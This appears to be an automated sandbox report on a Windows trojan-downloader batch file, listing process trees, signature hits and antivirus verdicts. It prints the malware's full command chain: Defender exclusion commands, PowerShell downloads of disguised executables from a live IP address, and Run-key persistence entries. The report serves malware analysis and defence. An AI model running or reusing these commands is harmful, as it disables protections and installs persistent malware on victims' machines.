Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | June 19, 2024, 9:30 a.m. | June 19, 2024, 9:33 a.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LCtKcmsKEZFv" C:\Users\test22\AppData\Local\Temp\lamda.cmd
2564 -
-
powershell.exe powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\RM'"
2724 -
powershell.exe powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\ProgramLogs'"
2836 -
powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\RM'"
2928 -
powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\ProgramLogs'"
3020 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus.exe' -OutFile 'C:\RM\AntiVirus.exe'"
1152 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus2.exe' -OutFile 'C:\RM\AntiVirus2.exe'"
1484 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus3.exe' -OutFile 'C:\RM\AntiVirus3.exe'"
2268 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus4.exe' -OutFile 'C:\RM\AntiVirus4.exe'"
2468 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftNetwork.exe' -OutFile 'C:\ProgramLogs\MicrosoftNetwork.exe'"
2600 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftRegistry.exe' -OutFile 'C:\ProgramLogs\MicrosoftRegistry.exe'"
2832 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftSecurity.exe' -OutFile 'C:\ProgramLogs\MicrosoftSecurity.exe'"
2776 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftValidator.exe' -OutFile 'C:\ProgramLogs\MicrosoftValidator.exe'"
2940 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram1" /t REG_SZ /d "C:\RM\AntiVirus.exe" /f
2064 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram2" /t REG_SZ /d "C:\RM\AntiVirus2.exe" /f
2204 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram3" /t REG_SZ /d "C:\RM\AntiVirus3.exe" /f
2368 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram4" /t REG_SZ /d "C:\RM\AntiVirus4.exe" /f
2456 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram5" /t REG_SZ /d "C:\ProgramLogs\MicrosoftNetwork.exe" /f
2580 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram6" /t REG_SZ /d "C:\ProgramLogs\MicrosoftRegistry.exe" /f
2128 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram7" /t REG_SZ /d "C:\ProgramLogs\MicrosoftSecurity.exe" /f
1304 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram8" /t REG_SZ /d "C:\ProgramLogs\MicrosoftValidator.exe" /f
2868
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus3.exe' -OutFile 'C:\RM\AntiVirus3.exe'" |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftValidator.exe' -OutFile 'C:\ProgramLogs\MicrosoftValidator.exe'" |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftNetwork.exe' -OutFile 'C:\ProgramLogs\MicrosoftNetwork.exe'" |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftSecurity.exe' -OutFile 'C:\ProgramLogs\MicrosoftSecurity.exe'" |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus.exe' -OutFile 'C:\RM\AntiVirus.exe'" |
cmdline | powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\RM'" |
cmdline | powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\ProgramLogs'" |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus2.exe' -OutFile 'C:\RM\AntiVirus2.exe'" |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus4.exe' -OutFile 'C:\RM\AntiVirus4.exe'" |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftRegistry.exe' -OutFile 'C:\ProgramLogs\MicrosoftRegistry.exe'" |
cmdline | powershell -Command "Add-MpPreference -ExclusionPath 'C:\ProgramLogs'" |
cmdline | powershell -Command "Add-MpPreference -ExclusionPath 'C:\RM'" |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate privileges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram6" /t REG_SZ /d "C:\ProgramLogs\MicrosoftRegistry.exe" /f |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram5" /t REG_SZ /d "C:\ProgramLogs\MicrosoftNetwork.exe" /f |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram2" /t REG_SZ /d "C:\RM\AntiVirus2.exe" /f |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram7" /t REG_SZ /d "C:\ProgramLogs\MicrosoftSecurity.exe" /f |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram1" /t REG_SZ /d "C:\RM\AntiVirus.exe" /f |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram8" /t REG_SZ /d "C:\ProgramLogs\MicrosoftValidator.exe" /f |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram4" /t REG_SZ /d "C:\RM\AntiVirus4.exe" /f |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram3" /t REG_SZ /d "C:\RM\AntiVirus3.exe" /f |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram1 | reg_value | C:\RM\AntiVirus.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram2 | reg_value | C:\RM\AntiVirus2.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram3 | reg_value | C:\RM\AntiVirus3.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram4 | reg_value | C:\RM\AntiVirus4.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram5 | reg_value | C:\ProgramLogs\MicrosoftNetwork.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram6 | reg_value | C:\ProgramLogs\MicrosoftRegistry.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram7 | reg_value | C:\ProgramLogs\MicrosoftSecurity.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram8 | reg_value | C:\ProgramLogs\MicrosoftValidator.exe |
count | 1778 | name | heapspray | process | powershell.exe | total_mb | 111 | length | 65536 | protection | PAGE_READWRITE |
Skyhigh | BehavesLike.Backdoor.zq |
VIPRE | Heur.BZC.MNT.Boxter.928.2802D7D3 |
Arcabit | Heur.BZC.MNT.Boxter.928.2802D7D3 [many] |
ESET-NOD32 | PowerShell/TrojanDownloader.Agent.GEI |
BitDefender | Heur.BZC.MNT.Boxter.928.2802D7D3 |
MicroWorld-eScan | Heur.BZC.MNT.Boxter.928.2802D7D3 |
Emsisoft | Heur.BZC.MNT.Boxter.928.2802D7D3 (B) |
FireEye | Heur.BZC.MNT.Boxter.928.2802D7D3 |
Kingsoft | Win32.Troj.Undef.a |
GData | Heur.BZC.MNT.Boxter.928.2A4E69C7 |
MAX | malware (ai score=81) |
alibabacloud | Trojan[downloader]:Win/BZC.MTB |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |